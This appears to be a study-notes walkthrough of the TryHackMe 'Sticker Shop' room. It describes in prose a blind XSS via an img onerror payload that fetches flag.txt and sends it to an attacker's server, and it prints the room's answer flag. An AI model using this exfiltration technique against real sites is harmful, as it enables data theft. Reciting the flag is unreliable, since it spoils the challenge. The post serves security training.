The post is a detailed walkthrough of a TryHackMe challenge called “The Sticker Shop,” which explores Cross-Site Scripting (XSS) vulnerabilities and how they can be leveraged to compromise a system.

COMPTIA Cyber Security Analyst (CySA+) Study Notes

OSCP Study Notes

Objective of the Challenge

Exploit this vulnerability to gain access to sensitive information, such as a flag file.

Investigate an XSS vulnerability in a fictitious Sticker Shop web application.

Step-by-Step Breakdown

Introduction

  • The challenge demonstrates how XSS vulnerabilities allow attackers to:
    1. Interact with the server.
    2. Access sensitive files.
  • The Sticker Shop’s website was built by inexperienced developers, making it vulnerable.

Exploration of the Website

  • Website Features:
    • Displays products (stickers), but they are non-interactive.
    • A feedback form accepts user inputs.
  • Initial Investigations:
    • Reviewed the page’s source code for hidden notes or developer comments but found nothing.
    • Tested the feedback form, as it accepts user input and interacts with the server backend.

Testing for XSS

  • Reflected XSS:
    • Attempted basic XSS payloads, such as an alert script, to observe if inputs were reflected in the server response.
    • These tests did not work, ruling out reflected XSS.
  • Blind XSS:
    • Crafted a payload using an <img> tag with a nonexistent source to trigger an error.
    • When the error occurred, a JavaScript fetch request was sent to the attacker’s server to test whether the server was executing malicious scripts.
    • Successfully confirmed the server’s vulnerability to blind XSS.

Exploiting the Vulnerability

  • Step 1: Read the Flag File
    • Modified the payload to:
      1. Fetch the contents of the flag.txt file.
      2. Transfer the file contents to the attacker’s server using JavaScript.
  • Payload Details:
    • Constructed a custom JavaScript payload embedded in an <img> tag.
    • Used error handling to trigger a fetch request to the flag.txt file on the server.
    • Redirected the file contents to the attacker’s server.
  • Step 2: Enhance the Attack
    • Rewrote the attack using a full JavaScript wrapper for better flexibility and clarity.
    • Included error handling, variable definitions, and HTTP requests to fetch and transmit the flag securely.

Key Learnings

  • XSS vulnerabilities can be exploited to retrieve sensitive information when combined with creative payloads.
  • Blind XSS attacks allow attackers to bypass restrictions where server responses are not directly visible.
  • Crafting advanced payloads, such as JavaScript wrappers, enables more complex exploitation.

Conclusion

  • Successfully retrieved the flag by leveraging blind XSS.
  • Demonstrated the process of identifying and exploiting web vulnerabilities step-by-step.
  • Emphasized the importance of secure web development practices to avoid such vulnerabilities.

TryHackMe The Sticker Shop | Room Answers

What is the content of flag.txt?
THM{83789a69074f636f64a38879cfcabe8b62305ee6}

Video Walkthrough

, ,
Show Comments

MasterMind Study Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles